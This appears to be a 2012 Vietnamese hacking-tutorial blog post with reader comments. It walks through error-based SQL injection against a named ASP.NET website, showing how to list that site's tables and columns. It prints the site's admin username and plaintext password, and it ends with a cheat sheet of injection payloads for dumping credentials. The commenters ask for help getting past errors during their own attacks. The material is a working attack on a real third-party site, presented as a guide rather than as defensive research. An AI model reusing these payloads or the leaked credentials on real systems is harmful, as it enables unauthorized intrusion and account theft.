Chủ Nhật, 18 tháng 3, 2012

[Bài 3 - SQLI] - Khai Thác Đối Với ASPX




Bước 1: Check link lỗi


Đối với site aspx, ta thêm dấu  ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi: 

Unclosed quotation mark after the character string ''

Chứng tỏ site dính lỗi SQLI.
Ví dụ:     http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’ 
















Bước 2: Truy vấn tên các table







Xuất hiện thông tin tên table thứ nhất: “tbl_DangNhap”. 


Conversion failed when converting the nvarchar value 'tbl_DangNhap' to data type int.

Tiếp tục truy vấn:



 Conversion failed when converting the nvarchar value 'tbl_DiaChi' to data type int.











Tiếp tục,



Conversion failed when converting the nvarchar value 'tbl_DoiTac' to data type int.
 
 Làm tương tự cho tới khi xuất hiện table user chứa thông tin username và password. Ở site này table chứa thông admin đăng nhập của admin là table đầu tiên:  Tbl_DangNhap
   

Bước 3 : Truy vấn tên các columns 


  Như thông tin khai thác được ở trên. Table chứa thông tin username và password chính là table: tbl_DangNhap. Chính vì vậy ta sẽ khai thác table này.



  
  Conversion failed when converting the nvarchar value 'ID' to data type int.






http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID')))-- - 



 
 Conversion failed when converting the nvarchar value 'TenDN' to data type int.


http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID','TenDN')))-- -


 Conversion failed when converting the nvarchar value 'Matkhau' to data type int.

   
Bước 4: Khai Thác thông tin username và password


 -    Thông tin username:


  
Conversion failed when converting the nvarchar value 'loimv' to data type int.  

-    Thông tin password 


  

Conversion failed when converting the nvarchar value 'maihoanglinh@' to data type int 
-   Hoặc get cả username và password




   Conversion failed when converting the nvarchar value 'loimv/maihoanglinh@' to data type int







 

Bước 5: Tìm link admin và đăng nhâp 

 Sử dụng tool havij hoặc web admin finder, đã được giới thiệu ở bài 2:


Ta được link admin: 


admin:         loimv


password:   maihoanglinh@




Kết Luận Các Query SQLI Trong Aspx Cần Lưu Ý


           1-      Get the version:
  
              and 1=convert(int,@@version)-- -

            2-  Get  Server Name

     and 1=convert(int,@@servername)-- -
 
3-  Get data base name:
 
     and 1=convert(int,db_name())-- -
 
4-  Get system user
 
     and 1=convert(int,system_user) -- -
 
5-  Get table thứ nhất
 
     and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
 
6-  Get table thứ 2:
 
   and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))-- -
 
7-  Get table thứ 3 :
 
     and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))-- -


8-   Get đến table user để lấy thông tin đăng nhập của admin
 
 
10 - Get column thứ nhất từ table chứa admin :
 
       and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))-- -
   
11-  Get column thứ nhất từ table chứa admin :
 
       and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")
                                               and column_name not in ("FIRST-COLUMNS-HERE")))-- -
 
   12-  Get cho hết các columns cần lấy thông tin
 
        
   13-  Xuất ra thông tin username và password
 
        and 1=convert(int,(select top 1 column-name-1%2b’/’%2bcolumn-name-2 from TABLE-NAME-HERE))-- -

7 nhận xét:

- Pi nói...

Bài này khó :)

Unknown nói...

bài này hay :)

icondep.com nói...

Thanks

Unknown nói...

em khai thác nhưng bị 1 câu thông báo lỗi

SELECT permission denied on object 'syscharsets', database 'master', owner 'dbo'.

tìm trên mạng thì có 1 số chỉ rằng sử dụng câu query:

;use dataname grant keyword on tables to public


nhưng tới đây em ko biết để cái câu query này vào đâu...

anh tư vấn giúp em với

THT nói...

Mình khai thác đến Get table thì bị lỗi như này:

Invalid object name 'information_schema.tables'

Bạn cho mình cách giải quyết với.

Thanks

Unknown nói...

Phần 8 và 12 trong mục Kết Luận Các Query SQLI Trong Aspx sao mất hết lệnh vậy anh dũng

Nặc danh nói...

Cho mình hỏi link dạng này thì khai thác kiểu gì ạ? --> Default.aspx?tabid=cd5e4df6-3414-41f7-82b8-9e7d1204f821

Đăng nhận xét